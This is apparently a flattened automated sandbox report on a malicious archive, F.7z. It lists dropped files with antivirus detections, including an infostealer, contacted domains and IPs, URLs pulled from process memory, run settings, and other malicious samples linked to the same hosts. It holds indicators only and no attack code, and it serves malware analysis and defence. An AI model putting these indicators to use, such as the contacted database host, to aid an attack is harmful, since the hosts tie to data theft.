    C:\Windows\System32\usvc.dat57%VirustotalBrowse
    C:\Windows\System32\vcruntime140d.dll0%ReversingLabs
    C:\Windows\System32\vcruntime140d.dll0%VirustotalBrowse
    C:\Windows\System32\x338625.dat79%ReversingLabsWin64.Infostealer.Tinba
    C:\Windows\System32\zlib1.dll0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    worldtimeapi.org0%VirustotalBrowse
    ipinfo.io0%VirustotalBrowse
    universalsqlserver.postgres.database.azure.com1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://dev.ditu.live.com/REST/v1/Routes/0%URL Reputationsafe
    https://dev.virtualearth.net/REST/v1/Routes/Driving0%URL Reputationsafe
    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx0%URL Reputationsafe
    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://dev.virtualearth.net/REST/v1/Routes/Walking0%URL Reputationsafe
    https://dev.ditu.live.com/mapcontrol/logging.ashx0%URL Reputationsafe
    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/0%URL Reputationsafe
    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=0%URL Reputationsafe
    https://dev.virtualearth.net/REST/v1/Transit/Schedules/0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    http://www.bingmapsportal.com0%URL Reputationsafe
    https://dev.virtualearth.net/REST/v1/Imagery/Copyright/0%URL Reputationsafe
    https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/0%URL Reputationsafe
    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx0%URL Reputationsafe
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
    https://go.micro0%URL Reputationsafe
    https://dev.ditu.live.com/REST/v1/Transit/Stops/0%URL Reputationsafe
    https://dev.virtualearth.net/REST/v1/Routes/0%URL Reputationsafe
    https://dev.virtualearth.net/REST/v1/Traffic/Incidents/0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=0%URL Reputationsafe
    https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=0%URL Reputationsafe
    https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?0%URL Reputationsafe
    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=0%URL Reputationsafe
    https://dev.virtualearth.net/REST/v1/Locations0%URL Reputationsafe
    https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/0%URL Reputationsafe
    https://dev.virtualearth.net/mapcontrol/logging.ashx0%URL Reputationsafe
    https://g.live.com/odclientsettings/Prod/C:0%URL Reputationsafe
    https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=0%URL Reputationsafe
    https://dynamic.t0%URL Reputationsafe
    http://www.zlib.net/D0%URL Reputationsafe
    https://dev.virtualearth.net/REST/v1/Routes/Transit0%URL Reputationsafe
    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
    https://www.openssl.org/H0%URL Reputationsafe
    https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen0%URL Reputationsafe
    https://aka.ms/pscore680%URL Reputationsafe
    https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=0%URL Reputationsafe
    https://dev.ditu.live.com/REST/v1/Locations0%URL Reputationsafe
    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=0%URL Reputationsafe
    https://curl.se/docs/alt-svc.html#0%Avira URL Cloudsafe
    https://t0.ssl.ak.dynamic.tiles.virtualearth.net0%Avira URL Cloudsafe
    https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
    https://www.openssl.org/0%Avira URL Cloudsafe
    https://curl.se/0%Avira URL Cloudsafe
    https://curl.se/docs/hsts.html#0%Avira URL Cloudsafe
    https://ipinfo.io/json0%Avira URL Cloudsafe
    http://www.gnu.org/licenses/0%Avira URL Cloudsafe
    https://curl.se/docs/hsts.html0%VirustotalBrowse
    https://www.openssl.org/0%VirustotalBrowse
    https://curl.se/docs/http-cookies.html0%VirustotalBrowse
    https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
    http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
    https://curl.se/0%VirustotalBrowse
    https://curl.se/docs/hsts.html#0%VirustotalBrowse
    https://www.gnu.org/licenses/0%Avira URL Cloudsafe
    https://curl.se/docs/alt-svc.html#0%VirustotalBrowse
    http://crl.ver)0%Avira URL Cloudsafe
    http://www.gnu.org/licenses/0%VirustotalBrowse
    https://g.live.com/odclientsettings/ProdV2/C:0%Avira URL Cloudsafe
    https://ipinfo.io/json0%VirustotalBrowse
    https://curl.se/docs/alt-svc.html0%Avira URL Cloudsafe
    http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
    https://github.com/Pester/Pester0%Avira URL Cloudsafe
    https://curl.se/docs/copyright.htmlD0%Avira URL Cloudsafe
    https://www.gnu.org/licenses/0%VirustotalBrowse
    http://worldtimeapi.org/api/timezone/Etc/UTCnB0%Avira URL Cloudsafe
    https://g.live.com/odclientsettings/ProdV2/C:0%VirustotalBrowse
    http://www.zlib.net/0%Avira URL Cloudsafe
    https://curl.se/docs/alt-svc.html0%VirustotalBrowse
    https://github.com/Pester/Pester1%VirustotalBrowse
    http://mingw-w64.sourceforge.net/X0%Avira URL Cloudsafe
    https://t0.ssl.ak.dynamic.tiles.virtualearth.net0%VirustotalBrowse
    https://curl.se/docs/copyright.html0%Avira URL Cloudsafe
    http://worldtimeapi.org/api/timezone/Etc/UTC0%Avira URL Cloudsafe
    https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=0%Avira URL Cloudsafe
    http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;0%Avira URL Cloudsafe
    https://curl.se/docs/copyright.htmlD0%VirustotalBrowse
    http://mingw-w64.sourceforge.net/X0%VirustotalBrowse
    https://curl.se/docs/http-cookies.html#0%Avira URL Cloudsafe
    https://curl.se/V0%Avira URL Cloudsafe
    http://www.zlib.net/0%VirustotalBrowse
    https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/0%Avira URL Cloudsafe
    https://curl.se/docs/http-cookies.html#0%VirustotalBrowse
    http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;0%VirustotalBrowse
    https://curl.se/docs/copyright.html0%VirustotalBrowse
    https://curl.se/V0%VirustotalBrowse
    https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/0%VirustotalBrowse
    http://worldtimeapi.org/api/timezone/Etc/UTC0%VirustotalBrowse
    https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=0%VirustotalBrowse

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    worldtimeapi.org
    		213.188.196.246
    		truefalseunknown
    ipinfo.io
    		34.117.59.81
    		truefalseunknown
    universalsqlserver.privatelink.postgres.database.azure.com
    		20.71.50.126
    		truefalse
      		unknown
      universalsqlserver.postgres.database.azure.com
      		unknown
      		unknownfalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://worldtimeapi.org/api/timezone/Etc/UTCfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      https://contoso.com/Licensepowershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://t0.ssl.ak.dynamic.tiles.virtualearth.netsvchost.exe, 00000009.00000003.1368418759.000001DEFEA32000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://www.openssl.org/svchost.exefalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000009.00000003.1368321157.000001DEFEA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369032766.000001DEFEA65000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://curl.se/docs/hsts.htmlconsole_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://curl.se/docs/alt-svc.html#console_zero.exefalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://curl.se/console_zero.exefalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://curl.se/docs/hsts.html#console_zero.exefalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://contoso.com/powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://nuget.org/nuget.exepowershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://ipinfo.io/jsonsvchost.exe, svchost.exe, 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp, x338625.dat.31.dr, usvc.dat.31.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000022.00000002.1899492113.000001C7BF361000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.bingmapsportal.comsvchost.exe, 00000009.00000002.1368820099.000001DEFEA13000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000009.00000002.1368953627.000001DEFEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368321157.000001DEFEA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.gnu.org/licenses/svchost.exe, 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp, libintl-9.dll.31.dr, usvc.dat.31.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://nuget.org/NuGet.exepowershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://curl.se/docs/http-cookies.htmlconsole_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://go.micropowershell.exe, 00000022.00000002.1899492113.000001C7C0D11000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000009.00000002.1368953627.000001DEFEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://contoso.com/Iconpowershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000009.00000003.1368418759.000001DEFEA32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368338734.000001DEFEA4C000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://www.gnu.org/licenses/svchost.exe, 0000002E.00000002.2329342995.00000000660F4000.00000008.00000001.01000000.0000001D.sdmp, usvc.dat.31.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000009.00000003.1368214670.000001DEFEA5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://crl.ver)svchost.exe, 00000003.00000002.2339567614.00000150FCA64000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000003.00000003.1202792782.00000150FC750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://curl.se/docs/alt-svc.htmlconsole_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000009.00000003.1368338734.000001DEFEA4C000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://github.com/Pester/Pesterpowershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpfalse
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://curl.se/docs/copyright.htmlDconsole_zero.exe, 00000033.00000002.2225813766.00007FFA33166000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://g.live.com/odclientsettings/Prod/C:edb.log.3.drfalse
      • URL Reputation: safe
      		unknown
      https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://worldtimeapi.org/api/timezone/Etc/UTCnBconsole_zero.exe, 00000033.00000002.2221368650.000001E28035C000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.zlib.net/console_zero.exefalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://dynamic.tsvchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369032766.000001DEFEA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://mingw-w64.sourceforge.net/Xsvchost.exe, 0000002E.00000002.2306483829.0000000064953000.00000008.00000001.01000000.0000001C.sdmp, usvc.dat.31.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://curl.se/docs/copyright.htmlconsole_zero.exefalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://www.zlib.net/Dconsole_zero.exe, 00000033.00000002.2226412628.00007FFA51137000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.drfalse
      • URL Reputation: safe
      		unknown
      https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://www.openssl.org/Hsvchost.exe, 0000002E.00000002.2388271854.00007FFA2CEE1000.00000002.00000001.01000000.00000018.sdmp, svchost.exe, 0000002E.00000002.2383458007.00007FFA244AE000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, libssl-3-x64.dll.31.dr, usvc.dat.31.drfalse
      • URL Reputation: safe
      		unknown
      https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;console_zero.exe, 00000033.00000000.2196558766.00007FF7834CD000.00000002.00000001.01000000.0000001E.sdmp, console_zero.exe.31.dr, usvc.dat.31.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://aka.ms/pscore68powershell.exe, 00000022.00000002.1899492113.000001C7BF361000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://curl.se/docs/http-cookies.html#console_zero.exefalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://curl.se/Vconsole_zero.exe, 00000033.00000002.2225813766.00007FFA33166000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      213.188.196.246
      		worldtimeapi.orgItaly
      		25400TELIA-NORWAY-ASTeliaNorwayCoreNetworksNOfalse
      34.117.59.81
      		ipinfo.ioUnited States
      		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
      20.71.50.126
      		universalsqlserver.privatelink.postgres.database.azure.comUnited States
      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

      Private

      IP
      127.0.0.1

      General Information

      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1501605
      Start date and time:2024-08-30 07:38:19 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 9m 49s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsinteractivecookbook.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:67
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:1
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:F.7z
      Detection:MAL
      Classification:mal100.expl.evad.win7Z@86/50@3/4
      EGA Information:
      • Successful, ratio: 66.7%
      HCA Information:Failed

      Warnings

      • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, WmiPrvSE.exe, TextInputHost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 184.28.90.27
      • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, e16604.g.akamaiedge.net, evoke-windowsservices-tas.msedge.net, settings-win.data.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target console_zero.exe, PID 3276 because there are no executed function
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • Report size getting too big, too many NtCreateKey calls found.
      • Report size getting too big, too many NtEnumerateKey calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      01:38:49API Interceptor1x Sleep call for process: OpenWith.exe modified
      01:39:05API Interceptor3x Sleep call for process: svchost.exe modified
      01:40:11API Interceptor88x Sleep call for process: powershell.exe modified
      01:40:13API Interceptor1x Sleep call for process: MpCmdRun.exe modified
      01:40:22API Interceptor1x Sleep call for process: explorer.exe modified
      01:40:45API Interceptor1x Sleep call for process: console_zero.exe modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      213.188.196.246Incident_Report_Harassment_by_Employee.docGet hashmaliciousUnknownBrowse
      • /api/ip
      out.exeGet hashmaliciousUnknownBrowse
      • /api/ip
      out.exeGet hashmaliciousUnknownBrowse
      • /api/ip
      potrgssavalue.msiGet hashmaliciousUnknownBrowse
      • /api/ip
      down.dllGet hashmaliciousUnknownBrowse
      • /api/ip
      down.dllGet hashmaliciousUnknownBrowse
      • /api/ip
      crypted.bin.exeGet hashmaliciousCryptOneBrowse
      • /api/ip
      crypted.bin.exeGet hashmaliciousCryptOneBrowse
      • /api/ip
      34.117.59.81mekotio_xoredps1.ps1Get hashmaliciousUnknownBrowse
      • ipinfo.io/json
      DevolucionImpuestoJulioTGR.cmd_BQVDQNuQQAGG.cmdGet hashmaliciousUnknownBrowse
      • ipinfo.io/json
      mek_n_bat.batGet hashmaliciousUnknownBrowse
      • ipinfo.io/json
      QMe7JpPtde.exeGet hashmaliciousUnknownBrowse
      • ipinfo.io/json
      z30PO1028930.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
      • ipinfo.io/ip
      SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exeGet hashmaliciousUnknownBrowse
      • ipinfo.io/ip
      SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exeGet hashmaliciousUnknownBrowse
      • ipinfo.io/ip
      IP-Grabber.ps1Get hashmaliciousUnknownBrowse
      • ipinfo.io/ip
      BadUsb.ps1Get hashmaliciousUnknownBrowse
      • ipinfo.io/ip
      ZmYfQBiw.exeGet hashmaliciousUnknownBrowse
      • ipinfo.io/

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      ipinfo.iogHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
      • 34.117.59.81
      kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
      • 34.117.59.81
      i3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
      • 34.117.59.81
      Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
      • 34.117.59.81
      eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
      • 34.117.59.81
      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      https://sesh-gangrene.shop/Get hashmaliciousHTMLPhisherBrowse
      • 34.117.59.81
      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      iBO7gzlZr3.exeGet hashmaliciousLummaCBrowse
      • 34.117.59.81
      trkfmve.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
      • 34.117.59.81
